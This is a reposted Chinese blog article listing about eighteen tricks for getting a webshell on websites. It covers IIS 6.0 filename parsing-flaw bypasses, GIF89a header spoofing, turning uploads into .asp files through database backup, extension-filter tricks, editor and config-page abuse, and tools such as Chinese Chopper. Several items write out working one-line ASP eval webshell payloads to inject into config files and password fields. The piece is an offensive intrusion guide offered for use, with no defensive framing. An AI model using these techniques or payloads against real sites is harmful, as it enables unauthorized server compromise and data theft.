我是靠谱客的博主 碧蓝蛋挞,最近开发中收集的这篇文章主要介绍一些拿shell技巧,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1.直接上传asp asa jsp cer php aspx htr cdx 格式的***,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg

2.有时上传图片格式的***,居然被程序检测拦截了,右键记事本打开***,在代码最前面加上gif89a,再数据库备份备份成asp格式的***拿下shell。

3.上传图片格式***,复制地址到数据库备份备份成asp格式***,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp; 或 1.asp;jpg

4.上传图片格式***,用抓包工具进行抓包,抓到的信息里面包含了上传路径以及cookie值,再利用明小子的综合上传功能上传asp***即可拿下shell。

5.当后台有数据库备份,但是没有任何上传点的时候,把一句话***插在任意处,再到数据库备份备份成asp格式***,用菜刀连接一句话***即可。

6.当后台存在网站配置,可以在里面增加任意图片格式,例如:asp 这时就可以上传asp格式的***了,有时不成功的话,就增加一个:aaspsp 即可绕过。 

7.当页面提示“上传格式不正确[重新上传]”,说明存在上传漏洞,复制地址放到明小子里上传,一般都能成功拿下shell。

8.当数据库备份功能用不了时,如果有数据库恢复的话,可以当作数据库备份一样使用,两者之间的功能以及效果是一样的。

9.一般PHP后台都有可增加目录功能,直接建立个目录,名称写1.asp,内容写脚本***的代码,保存后访问地址即可拿下shell。

10.有些网站前台存在“会员注册”,尝试注册一个账户进去找上传点,直接上传asp或解析漏洞,不行就抓包明小子上传,再者就是尝试一句话***。

11.当后台存在网站配置,在里面插入变异的一句话***:"%><%eval request("x")%><%s="访问路径:inc/config.asp

12.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再上传即可突破拿下shell。

13.登陆后台,点击修改密码---新密码设置为:1":eval request("h")’设置成功后,访问asp/config.asp文件即可,一句话***被写入到这个文件里面了.

14.当用啊D检测注入点,提示SA权限或DB权限的时候,尝试列目录,然后找到网站根目录复制,再点击cmd/上传,直接上传asp脚本***,不行就用差异备份拿shell。

15.在新闻发布、版权信息、留言管理处插入数据库加密的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾,访问路径inc/config.asp,菜刀连接密码:a

16.一般后台都存在ewebeditor编辑器,只要找出绝对路径登录进去,可以在样式管理中增加asa|aasasa 再点击预览进行上传脚本***即可。

18.用火狐浏览器登录后台,再打开双文件上传工具替换上传路径,这时直接将其拖入火狐浏览器里,第一个选jpg图片,第二个选cer***,上传即可突破!

转载于:https://blog.51cto.com/xiaoqin00/1708566

最后

以上就是碧蓝蛋挞为你收集整理的一些拿shell技巧的全部内容,希望文章能够帮你解决一些拿shell技巧所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(41)

评论列表共有 0 条评论

立即
投稿
返回
顶部